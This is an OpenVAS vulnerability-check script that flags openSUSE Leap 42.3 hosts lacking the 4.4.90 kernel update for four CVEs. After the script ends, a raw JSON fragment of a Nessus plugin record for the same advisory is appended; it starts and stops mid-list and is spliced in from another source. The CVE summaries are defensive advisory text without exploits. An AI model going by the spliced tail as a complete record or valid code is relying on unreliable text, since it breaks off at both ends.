openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2741-1)
2017-10-18T00:00:00
ID: OPENVAS:1361412562310851629
Type: openvas
Reporter: Copyright (C) 2017 Greenbone Networks GmbH
Modified: 2020-01-31T00:00:00
Description
The remote host is missing an update for the 'kernel' package(s) announced via the referenced advisory.
# Copyright (C) 2017 Greenbone Networks GmbH
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (C) of their respective author(s)
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.851629");
  script_version("2020-01-31T08:23:39+0000");
  script_tag(name:"last_modification", value:"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)");
  script_tag(name:"creation_date", value:"2017-10-18 16:55:24 +0200 (Wed, 18 Oct 2017)");
  script_cve_id("CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154", "CVE-2017-14489");
  script_tag(name:"cvss_base", value:"4.9");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:N/I:N/A:C");
  script_tag(name:"qod_type", value:"package");
  script_name("openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2741-1)");

  script_tag(name:"summary", value:"The remote host is missing an update for the 'kernel'
package(s) announced via the referenced advisory.");

  script_tag(name:"vuldetect", value:"Checks if a vulnerable package version is present on the target host.");

  script_tag(name:"insight", value:"The openSUSE Leap 42.3 kernel was updated to 4.4.90 to receive various
security and bugfixes.
The following security bugs were fixed:
- CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS
users to cause a denial of service (assertion failure, and hypervisor
hang or crash) via an out-of bounds guest_irq value, related to
arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).
- CVE-2017-14489: The iscsi_if_rx function in
drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local
users to cause a denial of service (panic) by leveraging incorrect
length validation (bnc#1059051).
- CVE-2017-12153: A security flaw was discovered in the
nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux
kernel This function did not check whether the required attributes are
present in a Netlink request. This request can be issued by a user with
the CAP_NET_ADMIN capability and may result in a NULL pointer
dereference and system crash (bnc#1058410).
- CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the
Linux kernel did not ensure that the 'CR8-load exiting' and 'CR8-store
exiting' L0 vmcs02 controls exist in cases where L1 omits the 'use TPR
shadow' vmcs12 control, which allowed KVM L2 guest OS users to obtain
read and write access to the hardware CR8 register (bnc#1058507).
The following non-security bugs were fixed:
- arc: Re-enable MMU upon Machine Check exception (bnc#1012382).
- arm64: fault: Route pte translation faults via do_translation_fault
(bnc#1012382).
- arm64: Make sure SPsel is always set (bnc#1012382).
- arm: pxa: add the number of DMA requestor lines (bnc#1012382).
- arm: pxa: fix the number of DMA requestor lines (bnc#1012382).
- bcache: correct cache_dirty_target in __update_writeback_rate()
(bnc#1012382).
- bcache: Correct return value for sysfs attach errors (bnc#1012382).
- bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).
- bcache: fix bch_hprint crash and improve output (bnc#1012382).
- bcache: fix for gc and write-back race (bnc#1012382).
- bcache: Fix leak of bdev reference (bnc#1012382).
- bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).
- block: Relax a check in blk_start_queue() (bnc#1012382).
- bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).
- btrfs: change how we decide to commit transactions during flushing
(bsc#1060197).
- btrfs: fix NULL pointer dereference from free_reloc_roots()
(bnc#1012382).
- btrfs: prevent to set invalid default subvolid (bnc#1012382).
- btrfs ...
Description truncated, please see the referenced URL(s) for more information.");

  script_tag(name:"affected", value:"Linux Kernel on openSUSE Leap 42.3");

  script_tag(name:"solution", value:"Please install the updated package(s).");

  script_xref(name:"openSUSE-SU", value:"2017:2741-1");
  script_tag(name:"solution_type", value:"VendorFix");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
  script_family("SuSE Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/suse", "ssh/login/rpms", re:"ssh/login/release=openSUSELeap42\.3");
  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

# Release identifier of the target, from the package list gathered over SSH.
release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";
report = "";

if(release == "openSUSELeap42.3") {
  # isrpmvuln() returns report text when the installed package is older than
  # the fixed version given in rpm:, and NULL otherwise.
  if(!isnull(res = isrpmvuln(pkg:"kernel-devel", rpm:"kernel-devel~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-docs", rpm:"kernel-docs~4.4.90~28.2", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-docs-html", rpm:"kernel-docs-html~4.4.90~28.2", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-docs-pdf", rpm:"kernel-docs-pdf~4.4.90~28.2", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-macros", rpm:"kernel-macros~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-source", rpm:"kernel-source~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-source-vanilla", rpm:"kernel-source-vanilla~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-debug", rpm:"kernel-debug~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-debug-base", rpm:"kernel-debug-base~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-debug-base-debuginfo", rpm:"kernel-debug-base-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-debug-debuginfo", rpm:"kernel-debug-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-debug-debugsource", rpm:"kernel-debug-debugsource~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-debug-devel", rpm:"kernel-debug-devel~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-debug-devel-debuginfo", rpm:"kernel-debug-devel-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-default", rpm:"kernel-default~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-default-base", rpm:"kernel-default-base~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-default-base-debuginfo", rpm:"kernel-default-base-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-default-debuginfo", rpm:"kernel-default-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-default-debugsource", rpm:"kernel-default-debugsource~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-default-devel", rpm:"kernel-default-devel~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-obs-build", rpm:"kernel-obs-build~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-obs-build-debugsource", rpm:"kernel-obs-build-debugsource~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-obs-qa", rpm:"kernel-obs-qa~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-syms", rpm:"kernel-syms~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-vanilla", rpm:"kernel-vanilla~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-vanilla-base", rpm:"kernel-vanilla-base~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-vanilla-base-debuginfo", rpm:"kernel-vanilla-base-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-vanilla-debuginfo", rpm:"kernel-vanilla-debuginfo~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-vanilla-debugsource", rpm:"kernel-vanilla-debugsource~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }
  if(!isnull(res = isrpmvuln(pkg:"kernel-vanilla-devel", rpm:"kernel-vanilla-devel~4.4.90~28.1", rls:"openSUSELeap42.3"))) {
    report += res;
  }

  if(report != "") {
    security_message(data:report);
  } else if(__pkg_match) {
    # A listed package is installed at a fixed version: exit as "not vulnerable".
    exit(99);
  }
  exit(0);
}

exit(0);
(bnc#1012382).\n\n - md/raid5: release/flush io in raid5_do_work()\n (bnc#1012382).\n\n - media: uvcvideo: Prevent heap overflow when accessing\n mapped controls (bnc#1012382).\n\n - media: v4l2-compat-ioctl32: Fix timespec conversion\n (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both\n infinite inputs (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input\n values with opposite signs (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of\n both inputs zero (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN\n propagation (bnc#1012382).\n\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both\n inputs negative (bnc#1012382).\n\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity\n and zero inputs (bnc#1012382).\n\n - mm: prevent double decrease of nr_reserved_highatomic\n (bnc#1012382).\n\n - nfsd: Fix general protection fault in\n release_lock_stateid() (bnc#1012382).\n\n - nvme-fabrics: generate spec-compliant UUID NQNs\n (bsc#1057498).\n\n - nvmet: Move serial number from controller to subsystem\n (bsc#1058550).\n\n - nvmet: preserve controller serial number between reboots\n (bsc#1058550).\n\n - pci: Allow PCI express root ports to find themselves\n (bsc#1061046).\n\n - pci: fix oops when try to find Root Port for a PCI\n device (bsc#1061046).\n\n - pci: Fix race condition with driver_override\n (bnc#1012382).\n\n - pci: Mark AMD Stoney GPU ATS as broken (bsc#1061046).\n\n - pci: shpchp: Enable bridge bus mastering if MSI is\n enabled (bnc#1012382).\n\n - perf/x86: Fix RDPMC vs. 
mm_struct tracking\n (bsc#1061831).\n\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs.\n mm_struct tracking' (bsc#1061831).\n\n - perf: xgene: Add APM X-Gene SoC Performance Monitoring\n Unit driver (bsc#1036737).\n\n - perf: xgene: Include module.h (bsc#1036737).\n\n - perf: xgene: Move PMU leaf functions into function\n pointer structure (bsc#1036737).\n\n - perf: xgene: Parse PMU subnode from the match table\n (bsc#1036737).\n\n - powerpc: Fix DAR reporting when alignment handler faults\n (bnc#1012382).\n\n - powerpc/perf: Cleanup of PM_BR_CMPL vs. PM_BRU_CMPL in\n Power9 event list (bsc#1056686, fate#321438,\n bsc#1047238, git-fixes 34922527a2bc).\n\n - powerpc/perf: Factor out PPMU_ONLY_COUNT_RUN check code\n from power8 (fate#321438, bsc#1053043, git-fixes\n efe881afdd999).\n\n - powerpc/pseries: Fix parent_dn reference leak in\n add_dt_node() (bnc#1012382).\n\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n\n - rdma/bnxt_re: Allocate multiple notification queues\n (bsc#1037579).\n\n - rdma/bnxt_re: Implement the alloc/get_hw_stats callback\n (bsc#1037579).\n\n - Revert 'net: fix percpu memory leaks' (bnc#1012382).\n\n - Revert 'net: phy: Correctly process PHY_HALTED in\n phy_stop_machine()' (bnc#1012382).\n\n - Revert 'net: use lib/percpu_counter API for\n fragmentation mem accounting' (bnc#1012382).\n\n - Revert 'Update\n patches.fixes/xfs-refactor-log-record-unpack-and-data-pr\n ocessing.patch (bsc#1043598, bsc#1036215).' \n\n - Revert 'xfs: detect and handle invalid iclog size set by\n mkfs (bsc#1043598).'\n\n - Revert 'xfs: detect and trim torn writes during log\n recovery (bsc#1036215).' 
\n\n - Revert 'xfs: refactor and open code log record crc check\n (bsc#1036215).'\n\n - Revert 'xfs: refactor log record start detection into a\n new helper (bsc#1036215).'\n\n - Revert 'xfs: return start block of first bad log record\n during recovery (bsc#1036215).'\n\n - Revert 'xfs: support a crc verification only log record\n pass (bsc#1036215).'\n\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure\n (bsc#1059465).\n\n - scsi: megaraid_sas: Check valid aen class range to avoid\n kernel panic (bnc#1012382).\n\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead\n (bnc#1012382).\n\n - scsi: sg: factor out sg_fill_request_table()\n (bnc#1012382).\n\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE\n (bnc#1012382).\n\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n\n - scsi: sg: use standard lists for sg_requests\n (bnc#1012382).\n\n - scsi: storvsc: fix memory leak on ring buffer busy\n (bnc#1012382).\n\n - scsi_transport_fc: Also check for NOTPRESENT in\n fc_remote_port_add() (bsc#1037890).\n\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp\n ingress path (bnc#1012382).\n\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN\n response trace records (bnc#1012382).\n\n - scsi: zfcp: fix missing trace records for early returns\n in TMF eh handlers (bnc#1012382).\n\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to\n correlate with HBA (bnc#1012382).\n\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI\n trace records (bnc#1012382).\n\n - scsi: zfcp: fix queuecommand for scsi_eh commands when\n DIX enabled (bnc#1012382).\n\n - scsi: zfcp: trace HBA FSF response by default on dismiss\n or timedout late response (bnc#1012382).\n\n - scsi: zfcp: trace high part of 'new' 64 bit SCSI LUN\n (bnc#1012382).\n\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n\n - skd: Avoid 
that module unloading triggers a\n use-after-free (bnc#1012382).\n\n - skd: Submit requests to firmware before triggering the\n doorbell (bnc#1012382).\n\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags\n (bnc#1012382).\n\n - smb: Validate negotiate (to protect against downgrade)\n even if signing off (bnc#1012382).\n\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback\n (bnc#1012382).\n\n - timer/sysclt: Restrict timer migration sysctl values to\n 0 and 1 (bnc#1012382).\n\n - tracing: Apply trace_clock changes to instance max\n buffer (bnc#1012382).\n\n - tracing: Erase irqsoff trace with empty write\n (bnc#1012382).\n\n - tracing: Fix trace_pipe behavior for instance traces\n (bnc#1012382).\n\n - tty: fix __tty_insert_flip_char regression\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() fast path\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() slow path\n (bnc#1012382).\n\n - Update\n patches.drivers/0029-perf-xgene-Remove-bogus-IS_ERR-chec\n k.patch (bsc#1036737).\n\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA\n offsets (bnc#1012382).\n\n - video: fbdev: aty: do not leak uninitialized padding in\n clk to userspace (bnc#1012382).\n\n - Workaround for kABI compatibility with DP-MST patches\n (bsc#1055493).\n\n - x86/cpu/amd: Hide unused legacy_fixup_core_id() function\n (bsc#1060229).\n\n - x86/cpu/amd: Limit cpu_core_id fixup to families older\n than F17h (bsc#1060229).\n\n - x86/fpu: Do not let userspace set bogus xcomp_bv\n (bnc#1012382).\n\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in\n core dumps (bnc#1012382).\n\n - x86/ldt: Fix off by one in get_segment_base()\n (bsc#1061872).\n\n - x86/mm: Fix boot crash caused by incorrect loop count\n calculation in sync_global_pgds() (bsc#1058512).\n\n - x86/mm: Fix fault error path using unsafe vma pointer\n (fate#321300).", "edition": 19, "cvss3": {"score": 7.1, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"}, "published": "2017-10-23T00:00:00", "title": 
"openSUSE Security Update : the Linux Kernel (openSUSE-2017-1160)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "modified": "2017-10-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-docs-html", "p-cpe:/a:novell:opensuse:kernel-obs-qa", "p-cpe:/a:novell:opensuse:kernel-docs-pdf", "p-cpe:/a:novell:opensuse:kernel-macros", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-obs-build", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo"], "id": "OPENSUSE-2017-1160.NASL", "href": "https://www.tenable.com/plugins/nessus/104075", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1160.\n#\n# The 
text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104075);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-14489\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2017-1160)\");\n script_summary(english:\"Check for the openSUSE-2017-1160 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE Leap 42.3 kernel was updated to 4.4.90 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel This function\n did not check whether the required attributes are\n present in a Netlink request. 
This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\nThe following non-security bugs were fixed :\n\n - arc: Re-enable MMU upon Machine Check exception\n (bnc#1012382).\n\n - arm64: fault: Route pte translation faults via\n do_translation_fault (bnc#1012382).\n\n - arm64: Make sure SPsel is always set (bnc#1012382).\n\n - arm: pxa: add the number of DMA requestor lines\n (bnc#1012382).\n\n - arm: pxa: fix the number of DMA requestor lines\n (bnc#1012382).\n\n - bcache: correct cache_dirty_target in\n __update_writeback_rate() (bnc#1012382).\n\n - bcache: Correct return value for sysfs attach errors\n (bnc#1012382).\n\n - bcache: do not subtract sectors_to_gc for bypassed IO\n (bnc#1012382).\n\n - bcache: fix bch_hprint crash and improve output\n (bnc#1012382).\n\n - bcache: fix for gc and write-back race (bnc#1012382).\n\n - bcache: Fix leak of bdev reference (bnc#1012382).\n\n - bcache: initialize dirty stripes in flash_dev_run()\n (bnc#1012382).\n\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n\n - bsg-lib: do not free job in bsg_prepare_job\n (bnc#1012382).\n\n - btrfs: change how we decide to commit transactions\n during flushing (bsc#1060197).\n\n - btrfs: fix NULL pointer dereference from\n free_reloc_roots() (bnc#1012382).\n\n - btrfs: prevent to set invalid default subvolid\n (bnc#1012382).\n\n - btrfs: propagate error to btrfs_cmp_data_prepare caller\n (bnc#1012382).\n\n - btrfs: qgroup: move noisy underflow warning to debugging\n build (bsc#1055755).\n\n - cifs: Fix SMB3.1.1 
guest authentication to Samba\n (bnc#1012382).\n\n - cifs: release auth_key.response for reconnect\n (bnc#1012382).\n\n - crypto: AF_ALG - remove SGL terminator indicator when\n chaining (bnc#1012382).\n\n - crypto: talitos - Do not provide setkey for non hmac\n hashing algs (bnc#1012382).\n\n - crypto: talitos - fix sha224 (bnc#1012382).\n\n - cxl: Fix driver use count (bnc#1012382).\n\n - dmaengine: mmp-pdma: add number of requestors\n (bnc#1012382).\n\n - drivers: net: phy: xgene: Fix mdio write (bsc#1057383).\n\n - drm: Add driver-private objects to atomic state\n (bsc#1055493).\n\n - drm/dp: Introduce MST topology state to track available\n link bandwidth (bsc#1055493).\n\n - efi/fb: Avoid reconfiguration of BAR that covers the\n framebuffer (bsc#1051987).\n\n - efi/fb: Correct PCI_STD_RESOURCE_END usage\n (bsc#1051987).\n\n - ext4: fix incorrect quotaoff if the quota feature is\n enabled (bnc#1012382).\n\n - ext4: fix quota inconsistency during orphan cleanup for\n read-only mounts (bnc#1012382).\n\n - f2fs: check hot_data for roll-forward recovery\n (bnc#1012382).\n\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n\n - ftrace: Fix memleak when unregistering dynamic ops when\n tracing disabled (bnc#1012382).\n\n - ftrace: Fix selftest goto location on error\n (bnc#1012382).\n\n - genirq: Fix for_each_action_of_desc() macro\n (bsc#1061064).\n\n - getcwd: Close race with d_move called by lustre\n (bsc#1052593).\n\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM\n switch (bnc#1022967).\n\n - input: i8042 - add Gigabyte P57 to the keyboard reset\n table (bnc#1012382).\n\n - iommu/vt-d: Avoid calling virt_to_phys() on NULL pointer\n (bsc#1061067).\n\n - ipv6: accept 64k - 1 packet length in\n ip6_find_1stfragopt() (bnc#1012382).\n\n - ipv6: add rcu grace period before freeing fib6_node\n (bnc#1012382).\n\n - ipv6: fix memory leak with 
multiple tables during netns\n destruction (bnc#1012382).\n\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n\n - iw_cxgb4: put ep reference in pass_accept_req()\n (fate#321658 bsc#1005778 fate#321660 bsc#1005780\n fate#321661 bsc#1005781).\n\n - KABI fix drivers/nvme/target/nvmet.h (bsc#1058550).\n\n - kabi/severities: ignore nfs_pgio_data_destroy\n\n - kABI: Workaround kABI breakage of AMD-AVIC fixes\n (bsc#1044503).\n\n - keys: fix writing past end of user-supplied buffer in\n keyring_read() (bnc#1012382).\n\n - keys: prevent creating a different user's keyrings\n (bnc#1012382).\n\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n\n - kvm: Add struct kvm_vcpu pointer parameter to\n get_enable_apicv() (bsc#1044503).\n\n - kvm: async_pf: Fix #DF due to inject 'Page not Present'\n and 'Page Ready' exceptions simultaneously\n (bsc#1061017).\n\n - kvm: PPC: Book3S: Fix race and leak in\n kvm_vm_ioctl_create_spapr_tce() (bnc#1012382).\n\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n\n - kvm: SVM: Add irqchip_split() checks before enabling\n AVIC (bsc#1044503).\n\n - kvm: SVM: delete avic_vm_id_bitmap (2 megabyte static\n array) (bsc#1059500).\n\n - kvm: SVM: Refactor AVIC vcpu initialization into\n avic_init_vcpu() (bsc#1044503).\n\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte()\n (bsc#1061017).\n\n - kvm: VMX: remove WARN_ON_ONCE in\n kvm_vcpu_trigger_posted_interrupt (bsc#1061017).\n\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n\n - mac80211: flush hw_roc_start work before cancelling the\n ROC (bnc#1012382).\n\n - md/bitmap: disable bitmap_resize for file-backed bitmaps\n (bsc#1061172).\n\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in\n break_stripe_batch_list (bnc#1012382).\n\n - md/raid5: release/flush io in raid5_do_work()\n (bnc#1012382).\n\n - media: uvcvideo: Prevent heap overflow when accessing\n mapped controls (bnc#1012382).\n\n - media: 
v4l2-compat-ioctl32: Fix timespec conversion\n (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both\n infinite inputs (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input\n values with opposite signs (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of\n both inputs zero (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN\n propagation (bnc#1012382).\n\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both\n inputs negative (bnc#1012382).\n\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity\n and zero inputs (bnc#1012382).\n\n - mm: prevent double decrease of nr_reserved_highatomic\n (bnc#1012382).\n\n - nfsd: Fix general protection fault in\n release_lock_stateid() (bnc#1012382).\n\n - nvme-fabrics: generate spec-compliant UUID NQNs\n (bsc#1057498).\n\n - nvmet: Move serial number from controller to subsystem\n (bsc#1058550).\n\n - nvmet: preserve controller serial number between reboots\n (bsc#1058550).\n\n - pci: Allow PCI express root ports to find themselves\n (bsc#1061046).\n\n - pci: fix oops when try to find Root Port for a PCI\n device (bsc#1061046).\n\n - pci: Fix race condition with driver_override\n (bnc#1012382).\n\n - pci: Mark AMD Stoney GPU ATS as broken (bsc#1061046).\n\n - pci: shpchp: Enable bridge bus mastering if MSI is\n enabled (bnc#1012382).\n\n - perf/x86: Fix RDPMC vs. mm_struct tracking\n (bsc#1061831).\n\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs.\n mm_struct tracking' (bsc#1061831).\n\n - perf: xgene: Add APM X-Gene SoC Performance Monitoring\n Unit driver (bsc#1036737).\n\n - perf: xgene: Include module.h (bsc#1036737).\n\n - perf: xgene: Move PMU leaf functions into function\n pointer structure (bsc#1036737).\n\n - perf: xgene: Parse PMU subnode from the match table\n (bsc#1036737).\n\n - powerpc: Fix DAR reporting when alignment handler faults\n (bnc#1012382).\n\n - powerpc/perf: Cleanup of PM_BR_CMPL vs. 
